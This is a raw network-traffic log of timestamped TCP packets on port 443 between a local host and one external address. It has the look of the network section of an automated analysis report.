                                                                                      Nov 8, 2024 10:47:23.565418005 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.565520048 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.565525055 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.567023993 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.567039967 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.567154884 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.567159891 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.567203045 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.567203045 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.567297935 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.567676067 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.567816019 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.567862034 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.569314957 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.569327116 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.569482088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.569530964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.569530964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.569535971 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.569753885 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.571185112 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.571197987 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.571341038 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.571863890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.571863890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.571863890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.571871996 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.572103977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589165926 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.589181900 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.589312077 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.589332104 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589332104 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589344025 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.589378119 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589381933 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.589478970 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589485884 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.589525938 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589525938 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589680910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589680910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589688063 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.589781046 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589828014 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589828014 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.589878082 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.643246889 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.769869089 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.769882917 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.769983053 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.770073891 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.770073891 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.770083904 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.770121098 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.770121098 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.770126104 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.770219088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.770219088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.770317078 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.771229029 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.771239042 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.771363020 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.771408081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.771408081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.771408081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.771414995 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.771456957 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.771507978 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.772929907 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.772942066 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.773065090 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.773071051 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.773111105 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.773111105 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.773159981 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.773159981 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.773209095 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.774805069 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.774815083 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.774950981 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.774996042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.774996042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.774996042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.775002003 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.775094032 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.776998043 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.777101994 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.777502060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.777502060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.777502060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.777502060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.777509928 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.778681040 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.778690100 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.778837919 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.778845072 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.778994083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.779409885 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.779550076 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.779603958 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.781151056 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.781162024 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.781321049 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.781321049 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.781366110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.781371117 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.781418085 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.781466961 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.781564951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.795800924 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.795814037 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.795969963 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.795969963 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.795980930 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796066046 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796066046 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796075106 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796087980 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796164036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796170950 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796212912 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796261072 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796310902 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796310902 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796408892 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796444893 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796457052 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796492100 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796606064 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796606064 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796653986 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796658993 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796703100 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796751976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796751976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796751976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796760082 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796852112 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796900988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796900988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.796907902 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.796950102 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797048092 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797048092 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797048092 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797096968 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797096968 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797103882 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.797146082 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797197104 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797200918 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.797296047 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797302008 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.797342062 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797342062 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797390938 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797440052 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797440052 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797444105 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.797487974 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797538042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797538042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.797585964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.798261881 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.798273087 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.798403025 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.798403978 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.798448086 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.798548937 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.798548937 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.798556089 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.799962997 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.799976110 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.800090075 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.800090075 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.800097942 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.800190926 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.800190926 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.800287962 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.802078962 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.802088976 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.802211046 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.802303076 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.802311897 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.802350998 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.803885937 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.803898096 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.804017067 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.804017067 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.804023981 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.804160118 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.804160118 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.805733919 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.805743933 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.805891991 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.805891991 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.805938005 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.805943012 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.805989027 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.805989027 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.806036949 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.807516098 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.807528019 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.807658911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.807658911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.807665110 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.807755947 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.807827950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822385073 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.822395086 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.822428942 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.822495937 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.822529078 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822529078 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822577000 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822577000 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822586060 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.822626114 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822674990 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822674990 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822772980 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822772980 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822782040 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.822823048 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822823048 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822920084 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822920084 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822945118 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.822968960 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.822968960 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823019028 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823019028 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823019028 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823019028 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823025942 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.823066950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823117971 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.823147058 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.823164940 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823164940 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823214054 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823214054 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823312044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823312044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823318958 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.823410034 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823410034 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823410034 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823417902 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.823458910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823594093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823672056 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.823676109 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.824166059 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.824177027 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.824296951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.824302912 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.824363947 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.824363947 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.824413061 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.826050997 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.826061964 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.826181889 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.826181889 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.826232910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.826236963 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.826329947 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.828056097 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.828068018 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.828200102 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.828200102 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.828208923 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.828243971 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.828293085 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.828392982 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.830071926 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.830126047 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.830214977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.830260038 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.830260038 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.830383062 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.830388069 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.831880093 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.831962109 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.832019091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.832026005 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.832067966 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.832067966 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.832118988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.832165003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.832165003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.832613945 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.832748890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.832853079 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.010626078 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.010823965 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.010823965 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.011874914 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.011887074 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.012008905 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.012073994 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.012073994 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.012079000 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.012123108 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.012171984 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.013622046 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.013789892 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.013794899 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.013839006 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.013946056 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.013946056 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.017790079 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.017802954 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.017936945 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.017936945 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.017944098 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:24.017982960 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.017982960 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.018030882 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.018080950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.018080950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.018080950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.018131971 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.018181086 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:24.018279076 CET49777443192.168.11.30172.67.137.62
